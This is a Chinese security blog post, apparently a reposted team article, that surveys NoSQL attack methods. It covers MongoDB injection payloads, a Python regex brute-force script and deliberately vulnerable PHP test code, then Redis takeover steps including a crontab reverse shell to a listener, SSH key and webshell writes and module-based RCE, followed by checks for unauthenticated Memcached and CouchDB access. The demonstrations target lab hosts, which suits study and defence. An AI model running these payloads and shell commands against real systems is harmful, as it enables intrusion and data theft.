NoSql数据库之漏洞利用方法总结

admin 2020年8月21日20:00:50评论348 views字数 10438阅读34分47秒阅读模式

这是 酒仙桥六号部队 的第 65 篇文章。

全文共计6406个字,预计阅读时长19分钟。


NoSQL数据库特性

NoSQL全称是Not Only SQL,意为不仅仅是SQL。是一种非关系型数据存储模式,它存储的不再是结构化数据,而是类型和固定的格式,以key-value键值对、列式、文档来存储。而相较于关系型数据库,非关系数据库的优点有如下几点:

1、快速读写  主要例子有Redis,由于其逻辑简单,而且纯内存操作,使得其性能非常出色,单节点每秒可以处理超过10万次读写操作。2、方便扩展  NoSQL去掉关系数据库的关系型特性,很容易横向扩展,摆脱了以往老是纵向扩展的诟病。3、低廉成本  相较于关系型数据库来说,企业级授权费用降低很多。4、灵活的数据类型  NoSQL无需事先为要存储的数据建立字段,随时可以存储自定义的数据格式。

NoSQL数据库分类和特点如下:

NoSql数据库之漏洞利用方法总结



NoSQL数据库注入

NoSQL数据库虽然不使用SQL语句,但用网上的一句话来说,有DB的地方就有injection。且NoSQL注入的危害更大,因语句是以Web应用程序的语言来注入并在服务器上执行,从而导致允许任意代码执行,所以潜在影响要大于传统的SQL注入。

NoSQL注入攻击流程(此图来源于owasp)

NoSql数据库之漏洞利用方法总结

NoSQL注入大概分为重言式、联合查询、Javascript、盲注、背负式查询、跨域违规等,由于背负式查询和跨域违规两种方式资料太少,也没有实战环境可测试,所以着重讲解前面几种注入方式。(此处使用MongoDB数据库来进行演示)

准备测试数据:

创建数据库use admin //创建一个admin数据库,如果有admin数据库就选择admin数据库插入数据db.admin.insert({'username':'time','password':'11111'})//默认会自动创建admin集合查询数据db.admin.find()//查询所有数据查看所有数据库show dbs 查看集合show collections

1、重言式

又称永真式,既在条件语句中注入代码使其表达式判定结果永远为真,从而绕过认证或访问机制。而怎么使其注入代码后让表达式判定结果永远为真,此处就不得不说一下Mongodb数据库的条件操作符了。如下:

$eq : =      //匹配字段值等于指定值的文档$gt : >    //匹配字段值大于指定值的文档$lt : <    //匹配字段值小于指定值的文档$gte: >=  //匹配字段值大于等于指定值的文档$lte: <=  //匹配字段值小于等于指定值的文档$ne : !=  //匹配字段值不等于指定值的文档,包括没有这个字段的文档$in : in  //匹配字段值等于指定数组中的任何值$nin: not in  //字段值不在指定数组或者不存在$and    //文档至少满足其中的一个表达式$or:or    //文档至少满足其中的一个表达式$not:     //反匹配(1.3.3及以上版本),字段值不匹配表达式或者字段值不存在模糊查询用正则式:db.customer.find({'name': {'$regex':'.*s.*'} })

而在重言式注入中需要用到的就是$ne,意为不等于指定值的数据查询出来,表达式ne=1,就是把数据库中除ne=1的所有值,全部查询出来。

//测试代码<?php# 连接数据库$manager = new MongoDBDriverManager("mongodb://localhost:27017");$uname = $_GET['username'];$pwd = $_GET['password'];
# 查询语句$query = new MongoDBDriverQuery(array( 'uname' => $uname, 'pwd' => $pwd));# 执行语句$result = $manager->executeQuery('admin.admin', $query)->toArray();$count = count($result);if ($count > 0) { foreach ($result as $user) { $user = ((array)$user); echo 'username:' . $user['uname'] . '<br>'; echo 'password:' . $user['pwd'] . '<br>'; }}else{ echo 'Not Found';}

如图,此处输入对的账号密码查询出一条语句。

NoSql数据库之漏洞利用方法总结

如果输入以下代码,则会将数据库中所有的账户密码全部查询出来:

http://192.168.239.135/n/login.php?username[$ne]=1&password[$ne]=1此处$ne是把数据库中$ne等于1之外的数据都查询出来 

NoSql数据库之漏洞利用方法总结

如果输入

username[$ne]=time&password[$ne]=time111,会将账户不是time的所有数据显示。

NoSql数据库之漏洞利用方法总结

当用户输入

username[$ne]=1&password[$ne]=1的时候,程序会将用户输入的账户密码构造成以下数据带入数据库中查询。

$query = new MongoDBDriverQuery(array(  'uname' => array($ne => 1),  'pwd' => array($ne => 1)));

数据库中查询出用户想要的数据。

NoSql数据库之漏洞利用方法总结

2、联合查询

攻击者利用一个脆弱的参数去改变给定查询返回的数据集,最常用的用法是绕过认证页面获取数据。比如通过增加永真式的表达式利用布尔的OR运算符导致整个语句判定出错。(因没有找到测试环境,此处大概讲一下注入方式)

小栗子(例):登录代码:

string query = "{ username:'" + post_username + "', password:'" + post_passport + ' " }"

当我们登录账户时,正确的查询语句如下:

{‘username’:'time',‘password’:'time111'}

如果构造一个恶意代码来忽略密码,那么就可以无需密码的情况下登录用户账号。

username=time',$or:[{},{'a':'a&password='}]
构造的恶意语句{'username':'time', '$or':[{},{'a':'a','password':''}]}

当将恶意语句带入数据库查询的时候匹配到当前用户的数据。

NoSql数据库之漏洞利用方法总结

3、JavaScript注入

新型注入漏洞,由允许执行数据内容中的javascript的NoSQL数据库引入的。JavaScript使在数据引擎进行复杂事物和查询成为可能。传递不干净的用户输入到这些查询中可以注入任意JavaScript代码,导致非法的数据获取或篡改。而Mongodb中的$where操作符就可以用来执行Javascript语句。

//测试代码<?php$manager = new MongoDBDriverManager("mongodb://localhost:27017");$query_body =array('$where'=>"function q() {  var username = ".$_REQUEST["username"].";  var password = ".$_REQUEST["password"].";if(username == 'time'&&password == 'time111') return true; else{ return false;}}");$query = new MongoDBDriverQuery($query_body);$cursor = $manager->executeQuery('test.test', $query)->toArray();if(count($cursor)>0){  echo "ok";}else{  echo "no";}

当不知道账号密码的时候,在地址栏随意输入字符,页面返回错误。

NoSql数据库之漏洞利用方法总结

当在参数后加上;return true;时页面返回ok。

NoSql数据库之漏洞利用方法总结

payload:username=1&password=1;return ture;
当输入return ture;程序会构造出以下语句'$where'=>"function q() { var username = ".$_REQUEST["username"]."; var password = ".$_REQUEST["password"]."; //在此处添加一段代码,不管用户输入什么都返回ture return ture; if(username == 'time'&&password == 'time111') return true; else{ return false;}}");带入数据库中查询成功

NoSql数据库之漏洞利用方法总结

4、盲注

NoSQL的盲注和SQL注入盲注类似,都是不返回数据,只是根据错误页面的返回来判断是否存在注入。此处我们需要用到的MongoDB的操作符来进行盲注$eq(等于)和$regex(正则匹配)。

//测试代码<?php$mongo = new mongoclient();$db = $mongo->test; //选择数据库$coll = $db->users; //选择集合$username = $_REQUEST['username'];$password = $_REQUEST['password'];if (is_array($username)) {    $data = array(        'username'=>$username);    $data = $coll->find($data);    if ($data->count()>0) {        echo 'yes';    }else{        echo 'time no';    }}else{    if ($username == 'time'&&$password=='time111') {        echo 'ok';    }else{        echo 'login no';    }}?>

随意输入字符,页面返回错误。

NoSql数据库之漏洞利用方法总结

如果使用已知用户名为time,页面同样返回错误,而怎么才能确定账户是否正确,此时需要借助操作符$eq+burp,可以帮我们快速查找正确的账户。

NoSql数据库之漏洞利用方法总结

首先找一个字典,由于我本地环境,所以用了四个账户测试。抓包:

payload:username[$eq]=§1111§&password=111

NoSql数据库之漏洞利用方法总结

设置字典:

NoSql数据库之漏洞利用方法总结

可以看见,跑出两个正确的用户名。

NoSql数据库之漏洞利用方法总结

当确定了账号后,密码则使用正则匹配$regex来获取:

//判断密码长度http://10.211.55.3/news.php?username[$eq]=time&password[$regex]=.{7}http://10.211.55.3/news.php?username[$eq]=time&password[$regex]=t.{6}http://10.211.55.3/news.php?username[$eq]=time&password[$regex]=ti.{5}http://10.211.55.3/news.php?username[$eq]=time&password[$regex]=tim.{4}以此类推数据库中查询语句会使用$regex和^{'username':{'$eq':'time'},'password':{'$regex':'^'}}

NoSql数据库之漏洞利用方法总结

而密码就有些复杂了,不能使用burp,不过可以借助脚本来测试。

脚本:

import requestsimport urllib3import stringimport urlliburllib3.disable_warnings()username = 'admin'password = ''target = 'http://127.0.0.1/mongo/test.php'while True:    for c in string.printable:        if c not in ['*', '+', '.', '?', '|', '#', '&', '$']:            payload = '?username=%s&password[$regex]=^%s' % (username, password + c)            r = requests.get(target + payload)            if 'OK' in r.text:                print("Found one more char : %s" % (password+c))                password += c

5、背负式查询

背负式查询是Memcached数据库的的一种注入,在php5.5的时候该漏洞被修复,由于网上资料较少,所以此处在网上摘抄了一部分作为了解。

语法:

set <KEY> <FLAG> <EXPIRE_TIME>   <LENGTH>,

当PHP配置的函数被调用时,接收参数如下:

$memcached->set('key', 'value');

该驱动程序未能针对带有回车r(0x0D)和换行的n(0x0A)的ASCII码采取措施,导致攻击者有机会注入包含有键参数的新命令行和其他非计划内的命令到缓存中8。如下代码,其中的$param是用户输入并作为键来作用:

$memcached=new Memcached(); $memcached ->addServer('localhost',11211); $memcached->set($param, "some value");

攻击者可以提供以下输入进行注入攻击:

"key1 0 3600 4rnabcdrnset key2 0 3600 4rninjectrn"

增加到数据库中的第一个键是具有"some value"值的key1。攻击者可以增加其他的、非计划内的键到数据库中,即带有"inject"值的key2。这种注入也可以发生在get命令上。看一下Memcached主页上的示例,它以这三行开头:

Function get_foo(foo_id) foo = memcached_get("foo: " . foo_id) return foo if defined foo

这个示例展示了Memcached的典型用法,在处理输入之前首先检查在数据库中是不是已经存在了。假设用类似代码检查从用户那里接收的认证令牌,验证他们是不是登录过了,那么就可以通过传递以下作为令牌的字符串来利用它:

"random_tokenrnset my_crafted_token 0 3600 4rnrootrn"

当这个字符串作为令牌传递时,数据库将检查这个"random_token"是否存在,然后将添加一个具有"root"值的"my_crafted_token"。之后,攻击者就可以发送具有root身份的my_crafted_token令牌了。 可以被这项技术攻击的其他指令还有:

incr <Key> <Amount>decr <Key> <Amount>delete <Key>

在此,incr用于增加一个键的值,decr用于缩减一个键的值,以及delete用于删除一个键。攻击者也可以用像set和get函数一样的手段来使用带来自己键参数的这三个函数。攻击者可以使用多条目函数进行同样的注入:deleteMulti、getMulti和setMulti,其中每一个键字段都可以被注入。回车换行注入可以被用于连接多个get请求。在一项我们进行的测试中,包括原始get在内最多可以连接17条。这样注入返回的结果是第一个键及其相应的值。

6、跨域违规

NoSQL数据库的另一个常见特点是,他们能够常常暴露能够从客户端应用进行数据库查询的HTTP REST API。暴露REST API 的数据库包括MongoDB、CouchDB和HBase。暴露REST API 就直接把数据库暴露给应用了,甚至是仅基于HTML5的应用,因为它不再需要间接的驱动程序了,让任何编程语言都可以在数据库上执行HTTP查询。这么做的优势非常明显,但这一特点是否伴随着安全风险?我们的回答是肯定的:这种REST API给跨站点请求伪造(CSRF)暴露了数据库,让攻击者绕过了防火墙和其他外围防御。

HTTP REST APIs是NoSQL数据库中的一个流行模块,然而,它们引入了一类新的漏洞,它甚至能让攻击者从其他域攻击数据库。在跨域攻击中,攻击者利用合法用户和他们的网页浏览器执行有害的操作。是一种跨站请求伪造(CSRF)攻击形式的违规行为,在此网站信任的用户浏览器将被利用在NoSQL数据库上执行非法操作。通过把HTML格式的代码注入到有漏洞的网站或者欺骗用户进入到攻击者自己的网站上,攻击者可以在目标数据库上执行post动作,从而破坏数据库。

现在让我们看看CSRF攻击是如何使用这个函数增加新文件到管理员集合中的,从而在hr数据库(它被认为处于安全的内部网络中)中增加了一个新的管理员用户,如下图所示。若想攻击成功,必须要满足几个条件。首先,攻击者必须能操作一个网站,要么是他们自己的网站,要么是利用不安全的网站。攻击在该网站放置一个HTML表单以及一段将自动提交该表单的脚本,比如:

<form action=" http://safe.internal. db/hr/admins/_insert" method="POST" name="csrf"><input type="text" name="docs" value=" [{"username":attacker}]" /></form><script> document.forms[0].submit(); </script>

NoSql数据库之漏洞利用方法总结

藏在防火墙后的内部网络内的用户被欺骗访问一个恶意外部网页,这将导致在内部网络的NoSQL数据库的 REST API 上执行非预期的查询。

第二,攻击者必须通过网络诱骗或感染用户经常访问的网站欺骗用户进入被感染的网站。最后,用户必须许可访问Mongoose HTTP接口。

用这种方式,攻击者不必进入内部网络即可执行操作,在本例中,是插入新数据到位于内部网络中的数据库中。这种攻击执行很简单,但要求攻击者要提前侦察去识别主机、数据库名称,等等。

7、node.js注入(靶场)

靶场下载地址:https://github.com/Charlie-belmer/vulnerable-node-app环境:node.js、Mongodb进入APP目录下使用命令: node server.js启动环境PS:若提示错误,使用npm install 下载报错模块
登录绕过

此页面注入可使用重言式进行绕过登录。

NoSql数据库之漏洞利用方法总结

使用burp抓包,如下图:

NoSql数据库之漏洞利用方法总结

payload:

修改password  {"username":"admin","password":{"$ne":1}}修改  {"username":{"$ne":1},"password":{"$ne":1}}都可绕过账户密码登录

注入成功。

NoSql数据库之漏洞利用方法总结

NoSql数据库之漏洞利用方法总结

where注入

此页面类似联合查询注入。

NoSql数据库之漏洞利用方法总结

注入恶意代码使得表达式为真来获取所有用户名。

payload:

username=' || '1'=='1
根据用户输入程序构造如下代码,带入数据库查询后返回所有用户信息’$where‘:’this.username‘ == '' || '1'=='1'

NoSql数据库之漏洞利用方法总结



NoSQL数据库GETSHELL方法

老生常谈,其实网上有很多关于Redis或Mongodb的漏洞利用方法,不过本文既然是讲NoSQL,Redis和Mongodb算是NoSQL数据库中的代表性数据库,所以本文也总结一下利用方法。

Redis getshell方法总结

环境搭建:

下载:wget http://download.redis.io/releases/redis-4.0.9.tar.gz解压:tar -zxvf redis-4.0.9.tar.gzcd redis-4.0.9makemake testmake install依次执行
配置redis.conf注释 bind 127.0.0.1关闭保护模式,将protected-mode yes改为no

未授权连接:

redis-cli -h 0.0.0.0 -p 6379 连接上靶机

NoSql数据库之漏洞利用方法总结

crontab-计划任务

本机监听:

nc -lvvp 4444

NoSql数据库之漏洞利用方法总结

redis:

set x "n* * * * * bash -i >& /dev/tcp/192.168.239.136/8888 0>&1n"config set dir /var/spool/cron/config set dbfilename rootsave

NoSql数据库之漏洞利用方法总结

接收到反弹shell。

NoSql数据库之漏洞利用方法总结

ssh-keygen

本地生成秘钥:

cd .sshssh-keygen -t rsa(echo -e "nn"; cat id_rsa.pub; echo -e "nn") > foo.txtcat foo.txt | redis-cli -h  192.168.239.129 -x set crackit

redis:

redis-cli -h  192.168.239.129config set dir /root/.ssh/config get dirconfig set dbfilename "authorized_keys"save
最后本机运行ssh -i id_rsa root@x.x.x.x

NoSql数据库之漏洞利用方法总结

写入webshell
redis-cli -h  192.168.239.129config set dir /var/www/html/config set dbfilename shell.phpset x "<?php phpinfo();?>"save

NoSql数据库之漏洞利用方法总结

写入成功

NoSql数据库之漏洞利用方法总结

利用主从复制RCE
so文件:git clone https://github.com/n0b0dyCN/RedisModules-ExecuteCommand(下载后进入目录make,获取恶意so文件)python脚本:git clone https://github.com/Ridter/redis-rce.git
执行命令:python3 redis-rce.py -r 192.168.239.129 -p 6379 -L 192.168.239.136 -f module.so

成功获取shell。

NoSql数据库之漏洞利用方法总结

MongoDB未授权访问

目标机:ubuntu

攻击机:kali

使用docker搭建漏洞环境。

拉取环境  sudo docker pull mongo查看镜像  sudo docker images启动容器  sudo docker run -d -p 27017:27017 --name mongodb mongo查看mongodb容器IP  sudo $docker inspect mongodb | grep IPAddress映射docker mongodb 27917端口到本机27917端口上  sudo iptables -t nat -A DOCKER -p tcp --dport 27917 -j DNAT --to-destination 172.17.0.2:27017

nmap扫描:

NoSql数据库之漏洞利用方法总结

至此,漏洞环境搭建成功。

使用metasploit扫描漏洞是否存在。

扫描模块  auxiliary/scanner/mongodb/mongodb_login

NoSql数据库之漏洞利用方法总结

使用Mongodb连接工具。

下载地址:https://nosqlbooster.com/downloads

输入靶机IP,连接即可。

NoSql数据库之漏洞利用方法总结

NoSql数据库之漏洞利用方法总结

连接成功。

NoSql数据库之漏洞利用方法总结

Memcached未授权访问

目标机:Centos7

环境搭建。

安装:  sudo yum install memcached启动服务  sudo memcached -d -m 128 -p 11211 -u root查看是否启动服务  sudo ps -ef | grep memcache安装客户端  sudo yum install php-memcached重启apache服务  service apache2 restart查看端口开放  netstat -an |more

当显示如下图,漏洞环境搭建成功。

NoSql数据库之漏洞利用方法总结

漏洞利用:

telnet 192.168.239.137 11211

成功。

NoSql数据库之漏洞利用方法总结

CouchDB未授权访问

目标机:Kali

环境搭建:

wget https://raw.githubusercontent.com/vulhub/vulhub/master/couchdb/CVE-2017-12636/docker-compose.yml
下载环境并启动 docker-compose up -d

如果访问不了网址,新建docker-compose.yml,将如下代码复制进去即可。

version: '2'services:  couchdb:    image: vulhub/couchdb:1.6.0     ports:      - "5984:5984"

环境搭建成功。

NoSql数据库之漏洞利用方法总结

漏洞利用

http://192.168.239.129:5984/_config        //网址后面加上_config,出现如下图说明存在漏洞

NoSql数据库之漏洞利用方法总结



总结

本文大概介绍了NoSQL注入的分类,主要讲的是MongoDB数据库注入,背负式和跨域违规,网上资料算是极少,只能从其他文章中摘录放到本文内。

不管是SQL注入还是Nosql注入,漏洞产生原因都是未对用户输入的数据进行过滤或过滤不严谨,虽然NoSQL不使用SQL语句,但可根据程序语言来进行注入,不管是PHP,Node.JS或其他语言,没有做好数据过滤照样存在注入,果然世上没有绝对安全的应用,别问,问就是研究的不够深。

参考链接

https://www.jianshu.com/p/25fb182ef52chttps://blog.csdn.net/qq_27446553/article/details/79379481?utm_medium=distribute.pc_aggpage_search_result.none-task-blog-2~all~baidu_landing_v2~default-1-79379481.nonecasehttps://cloud.tencent.com/developer/article/1602092https://nullsweep.com/a-nosql-injection-primer-with-mongo/https://scotch.io/@401/mongodb-injection-in-nodejshttps://www.cnblogs.com/wangyayun/p/6598166.html


NoSql数据库之漏洞利用方法总结

NoSql数据库之漏洞利用方法总结

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2020年8月21日20:00:50
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   NoSql数据库之漏洞利用方法总结http://cn-sec.com/archives/96380.html

发表评论

匿名网友 填写信息